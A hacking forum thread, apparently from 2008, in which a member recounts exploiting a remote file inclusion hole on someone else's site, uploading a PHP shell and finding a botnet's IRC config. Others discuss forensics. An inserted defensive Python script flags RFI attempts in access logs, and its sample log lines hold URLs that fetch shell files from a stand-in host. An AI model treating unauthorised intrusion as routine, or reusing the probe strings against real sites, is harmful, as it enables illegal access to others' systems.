Web assessment turns Botnet Tracking

  • disablmalfunc
    Member
    • Mar 2008
    • 21

    #1

    Web assessment turns Botnet Tracking

    Well, about every night till the early morning I like to perform web assessments to see what I can find in developers' web applications. Usually it's something different every day. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable PHP application on a website. The application was vulnerable to RFI, more commonly known as remote file inclusion. So I uploaded a PHP shell and took a look around. First place I look, of course, is the /tmp directory. Of course most of you know almost any user can run malicious code or upload an application in that directory because of the permissions that are set on it. Well, before I could even think about doing something like that I viewed what was already in the directory, and the first thing I saw was a "botnet.txt". So of course I "cat" the file, and in the very beginning was the configuration for an IRC server and its botnet owner. Then I quickly copied and pasted the configuration, exited the file and removed the malicious code. After thinking for a bit I decided to go check out what really goes on in that server, so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?
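The remote file inclusion entry point described in the post is something a defender can hunt for in web-server access logs. The following is an added example, not code from the thread: it parses constructed Apache combined-format log lines (documentation IP ranges, invented paths, not the site in the post) and flags query parameters whose value is a remote URL, which is what an RFI probe looks like from the server side.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlparse

# Constructed sample Apache access-log lines (not taken from the thread).
# 203.0.113.x / 198.51.100.x are documentation address ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2008:02:14:07 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2008:02:15:31 +0000] "GET /index.php?page=http://198.51.100.7/botnet.txt HTTP/1.1" 200 2048 "-" "libwww-perl/5.805"
203.0.113.9 - - [12/Mar/2008:02:15:40 +0000] "GET /index.php?page=ftp://198.51.100.7/shell.txt HTTP/1.1" 200 2048 "-" "libwww-perl/5.805"
203.0.113.11 - - [12/Mar/2008:02:16:02 +0000] "GET /index.php?page=https%3A%2F%2F198.51.100.7%2Fshell.txt HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes that PHP's include()/require() will fetch when allow_url_include=On.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://")


def find_rfi_attempts(log_text):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlparse(m.group("target")).query
        # parse_qsl percent-decodes values, so an encoded "https%3A%2F%2F" is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "param": name, "url": value,
                             "status": m.group("status")})
    return hits


def hits_by_source(hits):
    """Count flagged requests per client IP, for triage and blocking decisions."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    for h in find_rfi_attempts(SAMPLE_LOG):
        print(f'{h["ts"]} {h["ip"]} param={h["param"]} -> {h["url"]} ({h["status"]})')
    print(hits_by_source(find_rfi_attempts(SAMPLE_LOG)))
```

A 200 status on a flagged request is the line to worry about: it means the application served the page rather than rejecting the remote path, and the included host is the place to look for a dropped shell or a config like the botnet.txt in the post.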

  • Chris
    Great Satan of the East
    • Oct 2001
    • 2866

    #2
    Re: Web assessment turns Botnet Tracking

    Originally posted by disablmalfunc
    Well, about every night till the early morning I like to perform web assessments to see what I can find in developers' web applications. Usually it's something different every day. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable PHP application on a website. The application was vulnerable to RFI, more commonly known as remote file inclusion. So I uploaded a PHP shell and took a look around. First place I look, of course, is the /tmp directory. Of course most of you know almost any user can run malicious code or upload an application in that directory because of the permissions that are set on it. Well, before I could even think about doing something like that I viewed what was already in the directory, and the first thing I saw was a "botnet.txt". So of course I "cat" the file, and in the very beginning was the configuration for an IRC server and its botnet owner. Then I quickly copied and pasted the configuration, exited the file and removed the malicious code. After thinking for a bit I decided to go check out what really goes on in that server, so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?
    Did you leave the server with the botnet online? I would think the first thing you'd want to do is pull it offline.
    perl -e 'print pack(c5, (41*2), sqrt(7056), (unpack(c,H)-2), oct(115), 10)'

    • noid
      Fun Enforcement Agent
      • Oct 2001
      • 2394

      #3
      Re: Web assessment turns Botnet Tracking

      I'd pull it offline and do full forensics on it to see what sort of nastiness has made its way onto the box.

      I return whatever i wish . Its called FREEDOWM OF RANDOMNESS IN A HECK . CLUSTERED DEFEATED CORn FORUM . Welcome to me

      • Greyhatter
        Banned
        • May 2007
        • 408

        #4
        Re: Web assessment turns Botnet Tracking

        Sometimes just watching it for a bit will uncover the bot's intention and perhaps even take you to its leader.

        • disablmalfunc
          Member
          • Mar 2008
          • 21

          #5
          Re: Web assessment turns Botnet Tracking

          Well, I just recently started learning about intrusion forensics, and it seems the papers and books I study all have different thoughts on what to do if compromised. The one thing they all seem to agree on is preserving the hard drives, which I have done. What other things do you guys suggest should be the next step?

          • MikeyIckey
            Member
            • Mar 2008
            • 4

            #6
            Re: Web assessment turns Botnet Tracking

            Pretty funny conversation. Learned anything new about it?
            "The code itself sucked... it was not worth the $1.7 million they said"
            -Jonathan James

            • HANNAHHACKER
              Member
              • Apr 2008
              • 3

              #7
              Re: Web assessment turns Botnet Tracking

              Sounds quite interesting...

              For general knowledge, "solitario" is a Spanish word for lonely/alone; it is also a card game, though in this case I would think the owner went for the first meaning.

              It is also an Italian word for hermit, but I am not sure it is part of the Portuguese language.
              knowledge is power

              • xor
                not
                • Aug 2007
                • 1347

                #8
                Re: Web assessment turns Botnet Tracking

                Originally posted by HANNAHHACKER
                Sounds quite interesting...

                For general knowledge, "solitario" is a Spanish word for lonely/alone; it is also a card game, though in this case I would think the owner went for the first meaning.

                It is also an Italian word for hermit, but I am not sure it is part of the Portuguese language.
                :mind in gutter

                Or you could take it figuratively as playing with oneself. ;-)

                or to use Brit slang; he's a wanker!!!!! :-)

                :mind out of gutter.

                xor
                Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.

                • xor
                  not
                  • Aug 2007
                  • 1347

                  #9
                  Re: Web assessment turns Botnet Tracking

                  Originally posted by disablmalfunc
                  Well, I just recently started learning about intrusion forensics, and it seems the papers and books I study all have different thoughts on what to do if compromised. The one thing they all seem to agree on is preserving the hard drives, which I have done. What other things do you guys suggest should be the next step?
                  I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                  1. Get Caught
                  2. Make World News
                  3. Go To Prison
                  4. Write Security Book While In Prison
                  5. Get Out
                  6. Speak At Defcon
                  7. Land Security Consulting Job for Fortune 500 Making 6 Figures.

                  :-)

                  xor
                  Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.

                  • disablmalfunc
                    Member
                    • Mar 2008
                    • 21

                    #10
                    Re: Web assessment turns Botnet Tracking

                    Originally posted by xor
                    I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                    1. Get Caught
                    2. Make World News
                    3. Go To Prison
                    4. Write Security Book While In Prison
                    5. Get Out
                    6. Speak At Defcon
                    7. Land Security Consulting Job for Fortune 500 Making 6 Figures.

                    :-)

                    xor
                    Haha True. Then we would have nothing to look forward to. ^_^
